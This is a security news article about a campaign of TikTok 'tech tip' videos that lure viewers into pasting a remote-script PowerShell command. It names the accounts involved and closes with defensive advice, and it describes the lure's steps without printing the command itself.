Not TikTok!
What do Windows activation hacks, premium Spotify perks, and sketchy PowerShell commands have in common? If you guessed TikTok videos with hundreds of thousands of views, give yourself a gold star, or maybe a malware scan.
In a bizarre-yet-dangerous twist, cybercriminals have ditched the usual fake CAPTCHAs and shady download sites. Instead, they’ve turned to TikTok, where AI-generated “tech tip” videos walk users step-by-step through how to “unlock” apps like Windows, Microsoft Office, CapCut, and Spotify, all by running malicious code in PowerShell.
That’s right: videos that look like harmless life hacks are actually Trojan horses teaching viewers how to hack themselves.
The culprits? A now-defunct crew of TikTok accounts, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. One particularly convincing video promising to “boost your Spotify experience instantly” racked up nearly half a million views, 20,000 likes, and a comment section full of unwitting victims.
According to Trend Micro’s Junestherry Dela Cruz, this marks a new evolution in what’s known as a “ClickFix” attack, where users are lured into running harmful code directly in memory, bypassing traditional antivirus detection. In these TikTok tutorials, users are told to press Windows + R, open PowerShell, and copy a line of code displayed on screen. Boom: system compromised.
“This campaign shows just how far attackers will go to stay on trend, literally,” Dela Cruz said. “They’ll exploit whatever platform is hot right now to spread malware.”
One TikTok video (seen below), which tells viewers to run a PowerShell command, has gotten a lot of attention, over 20,000 likes and more than 100 comments. TikTok’s analytics show it’s been viewed nearly 500,000 times. That level of engagement suggests a lot of people saw the video as trustworthy, and many likely followed the instructions, not realizing they were putting their devices at risk.
In the video, the threat actor presents a series of simple, step-by-step instructions, making the malicious process appear both legitimate and easy to follow:
- Press Windows + R
- Type powershell and press Enter
- Execute the following command (please do not attempt):
These instructions are designed to socially engineer viewers into running a PowerShell command that downloads and executes a remote script, ultimately compromising their system.
How to Protect Yourself and Your Business from Social Media Malware
As hackers get smarter, they’re now using social media to spread malware. This means it’s time for businesses and users to rethink their defense strategies. Traditional methods like scanning links and checking domain reputation just aren’t enough anymore. To stay safe, we need a more holistic approach that includes social media monitoring, behavior tracking, and better user education. Here’s how you can stay ahead of the game:
1. Track Social Media Threats
By adding social media threat intelligence to your security toolkit, businesses can spot new attacks early. Monitoring social platforms lets you track high-engagement posts that might be hiding malicious content. Hackers often recycle the same tactics across different platforms, so connecting the dots between posts on Facebook, TikTok, Twitter, and others can help uncover larger, more dangerous campaigns.
2. Monitor User Behavior
Malware isn’t always about code—it can also be about what people do. Security systems should focus on spotting suspicious behavior. If someone suddenly runs a system command like PowerShell, or downloads files from unknown sources, that’s a red flag. Even small changes, like unauthorized folder creation or tweaks to security settings, can signal an attack.
3. Boost Social Engineering Awareness
It’s time to go beyond basic phishing training. Employees need to learn how social media can be used to trick them. Encouraging users to question any “too-good-to-be-true” offers, especially those from unverified video sources, can make a huge difference. Whether it’s on social media, messaging apps, or email, always verify before you act.
Bottom line: If someone on TikTok is telling you to run a command in PowerShell, especially to unlock “premium” features for free, don’t do it. Not unless you want to gift hackers your passwords, browsing history, and maybe your soul.